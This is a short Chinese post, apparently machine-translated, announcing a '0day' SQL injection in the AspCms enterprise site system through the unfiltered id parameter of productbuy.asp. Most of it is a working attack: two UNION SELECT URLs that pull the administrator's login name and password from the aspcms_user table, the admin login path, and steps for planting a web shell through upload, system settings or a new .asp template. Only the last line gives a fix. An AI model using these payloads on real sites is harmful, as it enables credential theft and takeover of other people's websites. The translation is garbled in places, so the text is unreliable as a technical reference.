在AspCms企业大厦系统0day漏洞介绍

点评：开源的企业管理系统的新的核0day AspCms企业管理制度超过2。2011-08-14 19:21aspcms发展，各种企业网站需要的能力，并支持模板定制的扩展等，在短时间内完成企业网站。

此漏洞发生在
/ / productbuy.asp插头
由于未接收到的参数id的过滤而导致的注入漏洞
注射后的页面有一个跳跃，所以它很快，建议用快捷键复制。
用户名
/ / productbuy插头。Aspid = 2 +协会+选择+ 1,2，登录名，4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25，
26,27,28,29,30,31,32,33,34,35,36,37 + + + + UserID = 1，aspcms_user
这是爆炸的ID = 1的帐户名称，如果发现是不够的，你可以试试、…

起爆密码
/ / productbuy插头。Aspid = 2 +协会+选择+ 1,2，密码，4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25，
26,27,28,29,30,31,32,33,34,35,36,37 + + + + UserID = 1，aspcms_user

后台登录地址： / / admin login.asp

后台的壳
1，直接上传。
2。系统配置信息
3、模板管理新1.asp模板，内容写马的内容。

修复方法：ID Cint（请求（ID））